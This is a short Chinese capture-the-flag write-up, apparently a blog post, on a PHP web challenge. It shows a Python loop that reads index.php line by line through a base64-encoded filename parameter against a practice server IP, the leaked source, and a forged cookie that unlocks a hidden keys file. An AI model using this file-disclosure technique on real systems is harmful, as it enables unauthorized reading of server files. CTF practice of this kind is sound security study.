url有base64。
base64解密得到key.txt
https://www.sojson.com/base64.html
尝试用filename访问index.php(原url使用base64,这也将index.php进行编码),line参数应该是行数,试一下line=2
出现了一行代码,试一下line=3.
出现了不同的代码。
用脚本将index.php的源码读出来。
import requests
s = ''
for i in range(0,30):
url = 'http://123.206.87.240:8002/web11/index.php?line='+str(i)+'&filename=aW5kZXgucGhw'
s = requests.get(url)
print(s.text)
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
构造Cookie margin=margin 然后读出来key.php即可。
按照要求提交flag。
2039
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
